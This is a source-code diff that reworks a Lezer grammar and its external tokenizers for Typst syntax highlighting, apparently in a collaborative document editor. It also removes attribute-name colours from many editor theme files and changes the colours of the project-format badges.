+const DOLLAR    = 36  // $
 const OPEN_BRACE  = 123 // {
 const CLOSE_BRACE = 125 // }
-const HASH        = 35  // #
-const UNDERSCORE  = 95  // _
-const DOT         = 46  // .
-const OPEN_PAREN  = 40  // (
-const COMMA       = 44  // ,
-const COLON       = 58  // :
-const SEMICOLON   = 59  // ;
-const OPEN_ANGLE  = 60  // <
-const CLOSE_ANGLE = 62  // >
-const PLUS        = 43  // +
-
-const KEYWORDS = new Set([
-  'let', 'set', 'show', 'import', 'include',
-  'if', 'else', 'for', 'while', 'return',
-  'break', 'continue', 'in', 'as',
-  'and', 'or', 'not', 'context',
-])
-
-const BOOLS = new Set(['true', 'false', 'none', 'auto'])
-
-const isAlpha = ch => (ch >= 65 && ch <= 90) || (ch >= 97 && ch <= 122)
-const isDigit = ch => ch >= 48 && ch <= 57
-const isIdentHead = ch => isAlpha(ch) || ch === UNDERSCORE
-const isIdentTail = ch => isAlpha(ch) || isDigit(ch) || ch === UNDERSCORE || ch === 45

 // ── headingTokenizer ────────────────────────────────────────────────────
 // Emits HeadingMark — the "=+" prefix plus the trailing whitespace.
@@ -90,17 +62,6 @@ export const headingTitleTokenizer = new ExternalTokenizer(
    while (input.next !== -1 && input.next !== NEWLINE) {
      if (input.next === SLASH &&
          (input.peek(1) === SLASH || input.peek(1) === STAR)) break
-      // Stop before a trailing '<label>' so it is parsed as a Label node
-      // rather than being merged into the heading title text.
-      // Only stops when '<' is immediately followed by a valid label name and '>'.
-      if (input.next === OPEN_ANGLE) {
-        const ch = input.peek(1)
-        if (isAlpha(ch) || isDigit(ch) || ch === UNDERSCORE) {
-          let j = 2
-          while (isIdentTail(input.peek(j)) || input.peek(j) === DOT || input.peek(j) === COLON) j++
-          if (input.peek(j) === CLOSE_ANGLE) break
-        }
-      }
      input.advance()
      hasContent = true
    }
@@ -144,20 +105,6 @@ export const rawTokenizer = new ExternalTokenizer(
    }

    if (stack.canShift(RawBlockBody)) {
-      // Guard: must genuinely follow a RawBlockOpen (which ends with \n).
-      // Walk backward past any lang tag (A-Za-z0-9) and require ```.
-      // This blocks spurious LALR-merged states from consuming body text.
-      if (input.peek(-1) !== NEWLINE) return
-      let back = -2
-      while (
-        (input.peek(back) >= 65 && input.peek(back) <= 90) ||
-        (input.peek(back) >= 97 && input.peek(back) <= 122) ||
-        (input.peek(back) >= 48 && input.peek(back) <= 57)
-      ) { back-- }
-      if (input.peek(back)     !== BACKTICK ||
-          input.peek(back - 1) !== BACKTICK ||
-          input.peek(back - 2) !== BACKTICK) return
-
      let hasContent = false
      while (input.next !== -1) {
        if (
@@ -189,6 +136,36 @@ export const rawInlineTokenizer = new ExternalTokenizer(
  { contextual: false }
 )

+// ── codeBlockTokenizer ──────────────────────────────────────────────────
+// Emits CodeBlockBody — the interior of a #{ ... } code block.
+// Tracks brace nesting depth so that inner braces (e.g. #{ f({ x }) })
+// are included in the body rather than closing the outer block.
+export const codeBlockTokenizer = new ExternalTokenizer(
+  (input, _stack) => {
+    // The opening '{' has already been consumed by the grammar rule.
+    let depth = 1
+    let hasContent = false
+    while (input.next !== -1) {
+      const ch = input.next
+      if (ch === OPEN_BRACE) {
+        depth++
+        input.advance()
+        hasContent = true
+      } else if (ch === CLOSE_BRACE) {
+        if (depth === 1) break  // leave this '}' for the grammar rule
+        depth--
+        input.advance()
+        hasContent = true
+      } else {
+        input.advance()
+        hasContent = true
+      }
+    }
+    if (hasContent) input.acceptToken(CodeBlockBody)
+  },
+  { contextual: false }
+)
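The depth-tracking scan used by `codeBlockTokenizer` can be sketched on a plain string, outside the Lezer tokenizer API. `findBlockEnd` is a hypothetical function that mirrors the loop above; like the tokenizer, it does not treat braces inside string literals specially.

```javascript
// Returns the index of the '}' that closes a block whose opening '{' has
// already been consumed, or -1 if the block is never closed.
function findBlockEnd(text, start) {
  let depth = 1
  for (let i = start; i < text.length; i++) {
    if (text[i] === '{') {
      depth++
    } else if (text[i] === '}') {
      if (depth === 1) return i // the closing brace of the outer block
      depth--
    }
  }
  return -1
}

const source = '#{ f({ x }) } tail'
const bodyStart = source.indexOf('{') + 1
const end = findBlockEnd(source, bodyStart)
const body = source.slice(bodyStart, end)
console.log(JSON.stringify(body))
```

The inner `{ x }` raises and lowers the depth, so only the final brace ends the body.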
+
 // ── blockCommentTokenizer ───────────────────────────────────────────────
 // Emits BlockCommentBody — the interior of a /* ... */ comment.
 // Typst supports nested block comments (/* /* inner */ outer */), so this
@@ -238,13 +215,9 @@ export const lineCommentContentTokenizer = new ExternalTokenizer(
 )

 // ── mathContentTokenizer ────────────────────────────────────────────────
-// Emits MathContent — one line of content between the $...$ delimiters.
-// Stops at '$' or '\n' so each token is bounded to a single line.
-//
-// The grammar uses MathContent* (not MathContent?) so multi-line display
-// math ($ ... \n ... $) is handled by multiple MathContent tokens, one per
-// line, with @skip consuming the newlines in between.  This keeps each
-// token short and prevents a stray '$' from consuming the whole document.
+// Emits MathContent — everything between the $...$ delimiters (no newlines).
+// External rather than a @tokens rule for the same reason as LineCommentContent:
+// ![$\n]+ overlaps with spaces, '<', '@', and other literals in merged states.
 export const mathContentTokenizer = new ExternalTokenizer(
  (input, _stack) => {
    let hasContent = false
@@ -256,174 +229,3 @@ export const mathContentTokenizer = new ExternalTokenizer(
  },
  { contextual: false }
 )
-
-// ── codeKeywordTokenizer ─────────────────────────────────────────────────
-// Emits CodeKeyword (let, set, for, while, in, …) ONLY when the preceding
-// character is '#', i.e. we are immediately after the '#' sigil in a CodeExpr.
-//
-// The peek(-1)==='#' guard is what prevents LALR state-merging from causing
-// these tokens to fire in body-text positions.  Common English words like
-// "in", "for", "while", "return" appear in markup paragraphs; without the
-// guard they would be highlighted as keywords due to LALR-merged states where
-// CodeKeyword is technically in the valid set.
-export const codeKeywordTokenizer = new ExternalTokenizer(
-  (input, stack) => {
-    if (!stack.canShift(CodeKeyword)) return
-    // Valid positions: after '#', ':', '{' (code block start), or ';'.
-    // Walk back past optional whitespace.
-    let back = -1
-    while (input.peek(back) === SPACE || input.peek(back) === TAB || input.peek(back) === NEWLINE) back--
-    const kwPrev = input.peek(back)
-    if (kwPrev !== HASH && kwPrev !== COLON && kwPrev !== OPEN_BRACE && kwPrev !== SEMICOLON) return
-
-    // Peek ahead to read the full identifier without advancing.
-    let len = 0
-    while (true) {
-      const ch = input.peek(len)
-      if (isIdentHead(ch) || (len > 0 && isIdentTail(ch))) { len++ } else { break }
-    }
-
-    if (len === 0) return
-
-    const chars = []
-    for (let i = 0; i < len; i++) chars.push(input.peek(i))
-    const word = String.fromCharCode(...chars)
-
-    if (!KEYWORDS.has(word)) return
-
-    for (let i = 0; i < len; i++) input.advance()
-    input.acceptToken(CodeKeyword)
-  },
-  { contextual: true }
-)
-
-// ── codeIdentTokenizer ───────────────────────────────────────────────────
-// Emits CodeIdent — identifier tokens inside code expressions (#ident,
-// #func(args), #obj.method, etc.).
-//
-// Moving CodeIdent from @tokens to an external tokenizer allows a
-// character-level guard: we only emit when the preceding non-whitespace
-// character is one of '#', '.', '(', ',' — genuine code-context positions.
-// This stops the token from firing in markup body text where LALR-merged
-// states would otherwise cause '_italic_' to be consumed as one big
-// CodeIdent (since '_' is a valid identHead) instead of opening Emphasis.
-//
-// Keywords and bools are excluded so codeKeywordTokenizer / CodeBool can
-// handle them without conflict.
-//
-// The backward scan runs BEFORE any canShift gate.  canShift(CodeArgKey) is
-// unreliable (LALR state merging can suppress it even at genuine arg-key
-// positions, e.g. 'caption:' after a complex nested call like 'table(...)').
-// We derive couldBeArgKey from character-level evidence ('(' or ',') and use
-// that to decide whether to continue even when canShift(CodeIdent) is false.
-export const codeIdentTokenizer = new ExternalTokenizer(
-  (input, stack) => {
-    const couldBeIdent = stack.canShift(CodeIdent)
-
-    // Walk back past whitespace — primary context discriminator.
-    let back = -1
-    while (input.peek(back) === SPACE || input.peek(back) === TAB || input.peek(back) === NEWLINE) back--
-    const prev = input.peek(back)
-
-    if (prev !== HASH && prev !== DOT && prev !== OPEN_PAREN && prev !== COMMA && prev !== EQUALS && prev !== COLON && prev !== PLUS) {
-      if (!isIdentTail(prev)) {
-        // prev is a structural delimiter (e.g. ')' after a function call, '{' at
-        // block start, '}' after a nested block).  These are valid statement-start
-        // positions inside a CodeBlock's codeStatement* list.  Trust canShift —
-        // it's reliable in the grammar-parsed code-block states.
-        if (!couldBeIdent) return
-      } else {
-        // prev looks like the tail of a preceding word — scan back to find '#' or ':'.
-        // Accepting ':' lets multi-word chains like 'show sel: set text' work.
-        let b = back
-        while (isIdentTail(input.peek(b))) b--
-        while (input.peek(b) === SPACE || input.peek(b) === TAB || input.peek(b) === NEWLINE) b--
-        const chainEnd = input.peek(b)
-        if (chainEnd !== HASH && chainEnd !== COLON) {
-          // Could be second+ statement in a code block (e.g. after 'let x = 1').
-          if (!couldBeIdent) return
-        }
-      }
-    }
-
-    // In arg-delimiter positions ('(' or ',') we may emit CodeArgKey regardless
-    // of canShift(CodeIdent) — LALR merging can suppress canShift(CodeIdent)
-    // after a complex first argument (e.g. figure(table(...), caption: ...)).
-    // ':' and '=' are value positions, NOT arg-key positions.
-    const couldBeArgKey = prev === OPEN_PAREN || prev === COMMA
-    if (!couldBeIdent && !couldBeArgKey) return
-
-    // Must start with an identifier head character.
-    if (!isIdentHead(input.next)) return
-
-    // Peek ahead to read the full identifier.
-    let len = 0
-    while (true) {
-      const ch = input.peek(len)
-      if (len === 0 ? isIdentHead(ch) : isIdentTail(ch)) { len++ } else { break }
-    }
-    if (len === 0) return
-
-    const chars = []
-    for (let i = 0; i < len; i++) chars.push(input.peek(i))
-    const word = String.fromCharCode(...chars)
-
-    // Let codeKeywordTokenizer handle keywords; let CodeBool handle bools.
-    if (KEYWORDS.has(word) || BOOLS.has(word)) return
-
-    // Emit CodeArgKey when this identifier is immediately followed by ':'.
-    // Only applies in arg-delimiter positions (couldBeArgKey).
-    let isArgKey = false
-    if (couldBeArgKey) {
-      let afterLen = len
-      while (input.peek(afterLen) === SPACE || input.peek(afterLen) === TAB) afterLen++
-      isArgKey = (input.peek(afterLen) === COLON)
-    }
-
-    for (let i = 0; i < len; i++) input.advance()
-    if (isArgKey) {
-      input.acceptToken(CodeArgKey)
-    } else if (couldBeIdent) {
-      input.acceptToken(CodeIdent)
-    }
-  },
-  { contextual: true }
-)
-
-// ── strongBodyTokenizer ──────────────────────────────────────────────────
-// Emits StrongBody — the content between the '*' delimiters of a Strong node.
-//
-// contextual: true — only fires when StrongBody is in the valid set, i.e.
-// inside Strong → "*" . StrongBody? "*".  This state is very specific and
-// is not merged with item* by Lezer's aggressive LALR merging, so canShift
-// is a reliable guard here.
-//
-// Reads everything up to the first '*' or newline (Typst bold does not span
-// lines).  A trailing '*' that is the closing delimiter is left for the
-// grammar rule to consume.
-export const strongBodyTokenizer = new ExternalTokenizer(
-  (input, _stack) => {
-    let hasContent = false
-    while (input.next !== -1 && input.next !== STAR && input.next !== NEWLINE) {
-      input.advance()
-      hasContent = true
-    }
-    if (hasContent) input.acceptToken(StrongBody)
-  },
-  { contextual: true }
-)
-
-// ── emphBodyTokenizer ────────────────────────────────────────────────────
-// Emits EmphBody — the content between the '_' delimiters of an Emphasis node.
-// Same design as strongBodyTokenizer; stops at '_' or newline.
-export const emphBodyTokenizer = new ExternalTokenizer(
-  (input, _stack) => {
-    let hasContent = false
-    while (input.next !== -1 && input.next !== UNDERSCORE && input.next !== NEWLINE) {
-      input.advance()
-      hasContent = true
-    }
-    if (hasContent) input.acceptToken(EmphBody)
-  },
-  { contextual: true }
-)
@@ -5,10 +5,8 @@
 //   headingTitleTokenizer — HeadingTitle: the title text to end of line
 //   rawTokenizer          — triple-backtick raw block open/body/close
 //   rawInlineTokenizer    — single-backtick raw inline content
+//   codeBlockTokenizer    — brace-depth tracking inside #{ ... }
 //   blockCommentTokenizer — depth-tracked nested /* ... */ comments
-//   codeIdentTokenizer    — CodeIdent: identifier, only fires in code context
-//   strongBodyTokenizer   — StrongBody: content inside *...*
-//   emphBodyTokenizer     — EmphBody: content inside _..._

@top Document { item* }

@@ -26,9 +24,8 @@ item {
  Label |
  Ref |
  Escape |
-  URL |
-  MarkupContent |
-  ClosingSquare
+  Newline |
+  MarkupContent
 }

 // ── Headings ──────────────────────────────────────────────────────────────
@@ -61,140 +58,63 @@ RawInline { "`" RawInlineContent? "`" }
 //   #[ ... ]          — content block (re-parses as markup items)
 CodeExpr { "#" codeExprBody }

-// codeExprBody: forms valid after '#' in markup, or after ':' / '=' in a
-// keyword-body.  FuncExpr handles ident+callSuffix(s); bare CodeIdent handles
-// a plain variable reference (#x).  No CallExpr with callSuffix* here — that
-// *-quantifier makes both shift and reduce carry !call precedence (a tie that
-// @right cannot resolve reliably once codeStatement* state-merging is in play).
 codeExprBody {
  KeywordExpr |
  AtomExpr |
-  FuncExpr   |
-  CodeIdent  |
+  CallExpr |
  CodeBlock |
  ContentBlock
 }

-// callOrValue covers the subject of a keyword expression (#set text, #show link,
-// #import "pkg", #let name).  keywordBody is exclusive: ':' for show-rule bodies
-// and '=' for let-binding values (a keyword expression never has both).
-// Two precedences:
-//   call @right — prefer extending callSuffixes (FuncExpr) over completing the
-//           FuncExpr and letting '(' start a new statement.  The `!call` marker
-//           encodes the shift as (call << 2) and the FuncExpr reduce as
-//           (call << 2) - 1 (due to @right); shift > reduce, so callSuffix
-//           chains are greedily extended.  Without @right both actions have
-//           the same numeric precedence and the conflict is unresolved.
-//   kw   — prefer CodeKeyword !kw callOrValueAndBody over CodeKeyword keywordBody?
-//           when an identifier follows the keyword.  shift = kw << 2, reduce
-//           (second alternative) = 0; kw > 0, no @right needed.
-// add — resolves the shift/reduce conflict when a '+' follows a codeArgValue:
-//   SHIFT '+' (extend codeArgValue → codeArgValue !add "+" codeValue): prec add
-//   REDUCE codeArgItem → codeArgValue (complete arg): prec 0
-//   add > 0 → shift wins, so 0.8pt + brand stays as one arg value.
-@precedence { call @right, kw, add }
-
-// KeywordExpr: used in markup-level code (#show, #let, #set …) AND nested
-// inside codeExprBody (e.g. the RHS after ':' in a show-rule).
-// Same two-alternative structure as codeStatement: the !kw on the first
-// alternative gives the shift prec kw > 0 over the unannotated reduce of the
-// second alternative (prec 0).  This avoids the call-vs-call tie that arises
-// from the old `callOrValue?` optional pattern.
-KeywordExpr {
-  CodeKeyword !kw callOrValueAndBody |
-  CodeKeyword keywordBody?
-}
-
-// callOrValue: FuncExpr for "ident(args)" / "ident.method", bare CodeIdent for
-// a plain name, CodeString for string subjects like #import "pkg".
-// FuncExpr requires at least one callSuffix, so at [CodeIdent ·] seeing '(':
-//   SHIFT (start callSuffixes, prec call) vs REDUCE bare CodeIdent (prec 0).
-//   call > 0 → shift wins cleanly.
-callOrValue { FuncExpr | CodeIdent | CodeString }
-keywordBody { ":" codeExprBody | "=" codeValue }
+// CallExpr? covers '#set text(size: 12pt)', '#show heading: ...', etc.
+// The optional CallExpr is only shifted when the next token is CodeIdent,
+// so there is no shift/reduce conflict with other items that follow keywords.
+KeywordExpr { CodeKeyword CallExpr? }
 AtomExpr    { CodeBool    }

-// codeStatement is the unit inside a CodeBlock's brace body.
-// Two explicit alternatives for the keyword case avoid the LALR ambiguity
-// that arises from codeStatement* merging when callOrValue? is optional.
-// The !kw annotation on the first alternative (shift callOrValueAndBody) has
-// higher precedence than the bare reduce of the second alternative (prec 0),
-// so 'show strong: …' grabs 'strong' as callOrValue rather than completing
-// KeywordExpr early with empty callOrValue.
-codeStatement {
-  CodeKeyword !kw callOrValueAndBody |
-  CodeKeyword keywordBody? |
-  codeValue |
-  ";"
-}
-callOrValueAndBody { callOrValue keywordBody? }
-
-// FuncExpr: identifier followed by one-or-more call suffixes.
-// callSuffixes uses explicit left-recursion (not +) so the !call annotation
-// on the recursive extension point gives the shift prec call vs the unannotated
-// reduce of codeValue → FuncExpr (prec 0) — shift wins, no @right tie.
-callSuffixes { callSuffix | callSuffixes !call callSuffix }
-FuncExpr { CodeIdent !call callSuffixes }
+CallExpr { CodeIdent callSuffix* }
 callSuffix {
  CodeArgs |
-  "." CodeIdent |
-  ContentBlock
+  "." CodeIdent
 }

 CodeArgs    { "(" codeArgList? ")" }
 codeArgList { codeArgItem ("," codeArgItem)* ","? }
 codeArgItem {
-  CodeArgKey ":" codeArgValue |
-  codeArgValue
+  CodeIdent ":" codeValue |
+  codeValue
 }

-// codeArgValue extends codeValue with '+' chaining for expressions like
-// `stroke: 0.8pt + brand` or `fill: base + overlay`.
-// Left-recursive rule: LALR state for codeArgValue · seeing '+':
-//   SHIFT '+' (extend, !add prec): prec add > 0
-//   REDUCE codeArgItem → codeArgValue (complete): prec 0
-//   add > 0 → shift wins cleanly.  No @right needed (strict dominance).
-// Only used inside CodeArgs, so codeStatement* LALR-merging does not apply.
-codeArgValue { codeValue | codeArgValue !add "+" codeValue }
-
 codeValue {
  CodeString |
  CodeNumber |
  CodeBool   |
-  FuncExpr   |
-  CodeIdent  |
+  CallExpr   |
  ContentBlock |
  CodeBlock  |
-  InlineMath |
-  CodeArray
+  InlineMath
 }

-// Typst array / tuple / dictionary literal: (a, b) or (key: val, …)
-// Reuses codeArgList so named-key entries like (auto, 1fr) work too.
-CodeArray { "(" codeArgList? ")" }
-
-// CodeBlock parses its content as a codeStatement* list so that keywords
-// (show, let, set…) and identifiers inside braces receive proper highlighting.
-CodeBlock    { "{" codeStatement* "}" }
+// CodeBlockBody depth-tracks braces so #{ let x = { 1 } } parses correctly.
+CodeBlock    { "{" CodeBlockBody? "}" }
 // ContentBlock re-enters markup mode, allowing #[*bold* text].
 ContentBlock { "[" item* "]" }

 // ── Math ──────────────────────────────────────────────────────────────────
 // Both inline ($x^2$) and display ($ x^2 $) math use the same node type.
-// MathContent* (not ?) allows multi-line display math: each line becomes one
-// MathContent token (stopping at '\n'), and @skip consumes the newlines between.
-InlineMath { "$" MathContent* "$" }
+InlineMath { "$" MathContent? "$" }

 // ── Markup formatting ─────────────────────────────────────────────────────
-// Strong and Emphasis use flat external body tokens (StrongBody / EmphBody)
-// rather than recursive strongItem* / emphItem* loops.  The loop approach
-// triggered LALR state merging that caused item*-level tokens (MarkupContent,
-// CodeIdent) to win over StrongText/EmphText inside the construct, so the
-// body nodes were never produced.  The flat external tokens are contextual
-// (canShift only fires inside Strong/Emphasis) and reliably avoid those
-// merged states.
-Strong   { "*" StrongBody? "*" }
-Emphasis { "_" EmphBody?   "_" }
+// Cross-nesting of Strong/Emphasis is intentionally excluded to avoid a
+// mutual-recursion cycle (Strong→Emphasis→Strong) that causes state explosion
+// in the Lezer LR automaton builder.  StrongText includes '_' and EmphText
+// includes '*', so the nested delimiters are treated as plain text inside the
+// opposite construct rather than producing error nodes.
+Strong { "*" strongItem* "*" }
+strongItem { CodeExpr | InlineMath | RawInline | Label | Ref | StrongText }
+
+Emphasis { "_" emphItem* "_" }
+emphItem { CodeExpr | InlineMath | RawInline | Label | Ref | EmphText }

 // ── Labels and references ─────────────────────────────────────────────────
 Label { "<" LabelName ">" }
@@ -222,6 +142,10 @@ Escape { "\\" EscapeChar }
  RawInlineContent
 }

+@external tokens codeBlockTokenizer from "./tokens.mjs" {
+  CodeBlockBody
+}
+
@external tokens blockCommentTokenizer from "./tokens.mjs" {
  BlockCommentBody
 }
@@ -234,44 +158,30 @@ Escape { "\\" EscapeChar }
  MathContent
 }

-@external tokens codeKeywordTokenizer from "./tokens.mjs" {
-  CodeKeyword
-}
-
-// CodeIdent is external so codeIdentTokenizer can apply a character-level
-// guard: it only emits when the preceding non-whitespace character is one of
-// '#', '.', '(', ',' — i.e. genuinely inside a code expression.  This stops
-// the token from firing in markup body text, where LALR state merging would
-// otherwise cause the entire token (including any leading '_') to be consumed
-// as a code identifier instead of letting '_' open an Emphasis.
-// CodeArgKey is emitted by the same tokenizer when an identifier is immediately
-// followed by ':' — the tokenizer pre-disambiguates named arg keys so the LALR
-// parser does not need to choose between codeArgItem alternatives on lookahead.
-@external tokens codeIdentTokenizer from "./tokens.mjs" {
-  CodeIdent,
-  CodeArgKey
-}
-
-@external tokens strongBodyTokenizer from "./tokens.mjs" {
-  StrongBody
-}
-
-@external tokens emphBodyTokenizer from "./tokens.mjs" {
-  EmphBody
-}
-
 // ── Regular tokens ────────────────────────────────────────────────────────
@tokens {
-  // All whitespace including newlines.  Heading detection still works because
-  // headingTokenizer uses input.peek(-1) on the raw character stream — it sees
-  // the '\n' byte regardless of what @skip consumes at the token level.
-  // Including '\n' here lets multi-line code expressions (e.g. #figure(\n  ...\n))
-  // parse without error instead of triggering Lezer error recovery.
-  spaces { $[ \t\n\r]+ }
+  // Horizontal whitespace only.  Newlines are kept as explicit Newline items
+  // so that HeadingMark (which checks start-of-line via input.peek(-1)) can
+  // reliably detect newlines in the raw input stream.
+  spaces { $[ \t]+ }
+
+  // Keywords take precedence over identifiers when they match fully
+  // (e.g. "let" → CodeKeyword, "letter" → CodeIdent).
+  CodeKeyword {
+    "let"      | "set"      | "show"     | "import"   | "include" |
+    "if"       | "else"     | "for"      | "while"    | "return"  |
+    "break"    | "continue" | "in"       | "as"       |
+    "and"      | "or"       | "not"      | "context"
+  }

  // Boolean / null literals — distinct from keywords for highlighting.
  CodeBool { "true" | "false" | "none" | "auto" }

+  // General identifier: [A-Za-z_][A-Za-z0-9_-]*
+  CodeIdent { identHead identTail* }
+  identHead  { @asciiLetter | "_" }
+  identTail  { @asciiLetter | @digit | "_" | "-" }
+
  // Double-quoted string with backslash escapes (no single-quoted strings in Typst).
  CodeString { '"' (!["\\\n] | "\\" _)* '"' }

@@ -281,42 +191,41 @@ Escape { "\\" EscapeChar }
    ("pt" | "mm" | "cm" | "in" | "em" | "rem" | "fr" | "deg" | "rad" | "%")?
  }

-  // URL: bare https:// or http:// links in markup text.  Matched as a single
-  // token so '://' is never split into ':' + LineComment '//…'.  Stops at
-  // whitespace and angle brackets (labels use '<…>').
-  URL { ("https" | "http") "://" (![ \t\n<>])* }
+  // Text tokens for markup contexts; each excludes its own delimiters.
+  // HeadingText, LineCommentContent, and MathContent are external tokens
+  // (see above) — broad "read-to-delimiter" tokens that would otherwise
+  // conflict with every other literal token in LALR-merged states.
+  // '<' is excluded from StrongText/EmphText so that Label ('<' LabelName '>')
+  // is recognised inside strong/emphasis rather than consumed as plain text.
+  StrongText   { ![\n*$#`<@\\]+   }
+  EmphText     { ![\n_$#`<@\\]+   }

  // Regular markup: excludes all special-character starters plus whitespace
  // (whitespace is handled by @skip).  The '/' is excluded so that '//' and
-  // '/*' are not accidentally consumed as plain text.  ']' is excluded so
-  // that ContentBlock { "[" item* "]" } can always close reliably — a bare
-  // ']' in body text is matched as ClosingSquare instead.
-  MarkupContent { ![\n \t\]=*_$#/<@`\\]+ }
-
-  // Fallback for a bare ']' in markup text (outside any ContentBlock).
-  // Inside ContentBlock the literal "]" terminal wins via @precedence.
-  ClosingSquare { "]" }
+  // '/*' are not accidentally consumed as plain text.
+  MarkupContent { ![\n \t=*_$#/<@`\\]+ }

  // Label names: identifiers with optional dots/colons (e.g. <sec:intro>).
-  LabelName { (@asciiLetter | "_" | @digit) (@asciiLetter | @digit | "_" | "-" | "." | ":")* }
-  RefName   { (@asciiLetter | "_") (@asciiLetter | @digit | "_" | "-")*                      }
+  LabelName { (identHead | @digit) (identTail | "." | ":")* }
+  RefName   { identHead identTail*                           }

  // Escape: any single character after backslash.
  EscapeChar { _ }

-  // Resolve ambiguities in merged states:
-  // EscapeChar > spaces: after '\', EscapeChar must win over the skip token.
-  // "(" > "." > "]": callSuffix delimiters must win over MarkupContent after
-  //   a code identifier (merged states expose these to the markup tokenizer).
-  // "_" > MarkupContent: '_' must open Emphasis rather than being swallowed
-  //   by MarkupContent (redundant since '_' is in MarkupContent's exclusion
-  //   set, but kept for clarity).
-  // CodeIdent and StrongText/EmphText are now external tokens — not listed.
-  // "["  > MarkupContent: ContentBlock callSuffix wins in merged code/markup states.
-  // CodeString > MarkupContent: '"' starts a string literal after a keyword.
-  // ":"  > MarkupContent: keywordBody ':' wins over markup colon in code states.
-  // URL > MarkupContent: 'https://' / 'http://' wins over plain markup text.
-  @precedence { CodeBool EscapeChar CodeString URL "[" ":" "(" "." "+" "]" ClosingSquare "_" spaces MarkupContent }
+  // Newline item — kept out of @skip so heading detection works.
+  Newline { "\n" }
+
+  // Resolve ambiguities: more-specific tokens win over broader catch-alls.
+  // EscapeChar > spaces: after '\', EscapeChar must win over the skip token
+  //   (both match \t; without this, '\t' would be mis-tokenized).
+  // "(" > "." > "]" > text tokens: after '#' CodeIdent, callSuffix delimiters
+  //   must win over MarkupContent/StrongText/EmphText in merged states.
+  // LineCommentContent and MathContent are external tokens — not listed here.
+  // "_" added after CodeIdent: KeywordExpr { CodeKeyword CallExpr? } merges
+  // the post-keyword state with markup states where "_" starts Emphasis.
+  // CodeIdent wins so '#set _name(...)' is tokenised correctly; in pure markup
+  // states CodeIdent is not in the valid set so "_" still opens Emphasis.
+  @precedence { CodeKeyword CodeBool CodeIdent EscapeChar "(" "." "]" "_" spaces MarkupContent StrongText EmphText }
 }

@skip { spaces }
@@ -1,45 +0,0 @@
-// This file was generated by lezer-generator. You probably shouldn't edit it.
-export const
-  HeadingMark = 1,
-  HeadingTitle = 2,
-  RawBlockOpen = 3,
-  RawBlockBody = 4,
-  RawBlockClose = 5,
-  RawInlineContent = 6,
-  BlockCommentBody = 7,
-  LineCommentContent = 8,
-  MathContent = 9,
-  CodeKeyword = 10,
-  CodeIdent = 11,
-  CodeArgKey = 12,
-  StrongBody = 13,
-  EmphBody = 14,
-  Document = 15,
-  Heading = 16,
-  LineComment = 17,
-  BlockComment = 18,
-  RawBlock = 19,
-  RawInline = 20,
-  CodeExpr = 21,
-  KeywordExpr = 22,
-  FuncExpr = 23,
-  CodeArgs = 24,
-  CodeString = 25,
-  CodeNumber = 26,
-  CodeBool = 27,
-  ContentBlock = 28,
-  CodeBlock = 29,
-  InlineMath = 30,
-  CodeArray = 31,
-  AtomExpr = 32,
-  Strong = 33,
-  Emphasis = 34,
-  Label = 35,
-  LabelName = 36,
-  Ref = 37,
-  RefName = 38,
-  Escape = 39,
-  EscapeChar = 40,
-  URL = 41,
-  MarkupContent = 42,
-  ClosingSquare = 43
@@ -73,10 +73,7 @@
    },
    ".tok-variableName": {
      "color": "#9b859d"
-    },
-    ".tok-attributeName": {
-      "color": "#F4BF75"
    }
  },
  "dark": true
-}
+}
@@ -74,10 +74,7 @@
    },
    ".tok-variableName": {
      "color": "#FF80E1"
-    },
-    ".tok-attributeName": {
-      "color": "#FFD700"
    }
  },
  "dark": true
-}
+}
@@ -56,10 +56,7 @@
    },
    ".tok-attributeValue": {
      "color": "rgb(0, 64, 128)"
-    },
-    ".tok-attributeName": {
-      "color": "#994409"
    }
  },
  "dark": false
-}
+}
@@ -67,10 +67,7 @@
    },
    ".tok-attributeValue": {
      "color": "#234A97"
-    },
-    ".tok-attributeName": {
-      "color": "#7B3814"
    }
  },
  "dark": false
-}
+}
@@ -69,10 +69,7 @@
    },
    ".tok-list": {
      "color": "rgb(185, 6, 144)"
-    },
-    ".tok-attributeName": {
-      "color": "#994409"
    }
  },
  "dark": false
-}
+}
@@ -53,10 +53,7 @@
    ".tok-regexp": {
      "color": "#009926",
      "fontWeight": "normal"
-    },
-    ".tok-attributeName": {
-      "color": "#735C0F"
    }
  },
  "dark": false
-}
+}
@@ -71,10 +71,7 @@
    ".tok-comment": {
      "fontStyle": "italic",
      "color": "#00E060"
-    },
-    ".tok-attributeName": {
-      "color": "#F4BF75"
    }
  },
  "dark": true
-}
+}
@@ -55,10 +55,7 @@
    },
    ".tok-operator": {
      "color": "#EBDAB4"
-    },
-    ".tok-attributeName": {
-      "color": "#FABD2F"
    }
  },
  "dark": true
-}
+}
@@ -61,10 +61,7 @@
    ".tok-comment": {
      "fontStyle": "italic",
      "color": "#BC9458"
-    },
-    ".tok-attributeName": {
-      "color": "#DA4939"
    }
  },
  "dark": true
-}
+}
@@ -70,10 +70,7 @@
    },
    ".tok-variableName": {
      "color": "#FF80E1"
-    },
-    ".tok-attributeName": {
-      "color": "#d4c96e"
    }
  },
  "dark": true
-}
+}
@@ -64,10 +64,7 @@
    },
    ".tok-list": {
      "color": "#8F5B26"
-    },
-    ".tok-attributeName": {
-      "color": "#994409"
    }
  },
  "dark": false
-}
+}
@@ -57,10 +57,7 @@
    },
    ".tok-number": {
      "color": "#5A5CAD"
-    },
-    ".tok-attributeName": {
-      "color": "#7B3F00"
    }
  },
  "dark": false
-}
+}
@@ -66,10 +66,7 @@
    },
    ".tok-variableName": {
      "color": "#C1C144"
-    },
-    ".tok-attributeName": {
-      "color": "#ACA0DC"
    }
  },
  "dark": true
-}
+}
@@ -72,10 +72,7 @@
    },
    ".tok-list": {
      "color": "rgb(185, 6, 144)"
-    },
-    ".tok-attributeName": {
-      "color": "#994409"
    }
  },
  "dark": false
-}
+}
@@ -69,10 +69,7 @@
    },
    ".tok-attributeValue": {
      "color": "#7587A6"
-    },
-    ".tok-attributeName": {
-      "color": "#CF6A4C"
    }
  },
  "dark": true
-}
+}
@@ -407,19 +407,15 @@ ul.project-list-filters {
    white-space: nowrap;

    &.project-format-badge-quarto {
-      background-color: #447099; // Quarto blue (PDF output)
-    }
-
-    &.project-format-badge-quarto-slides {
-      background-color: #e4637c; // RevealJS pink-red
+      background-color: #447099;
    }

    &.project-format-badge-typst {
-      background-color: #239dad; // typst.app brand blue
+      background-color: #ee6331;
    }

    &.project-format-badge-latex {
-      background-color: #098842; // Overleaf brand green
+      background-color: #72994e;
    }
  }

@@ -53,7 +53,6 @@ export type ProjectApi = {
  accessLevel: ProjectAccessLevel
  source: Source
  compiler?: ProjectCompiler
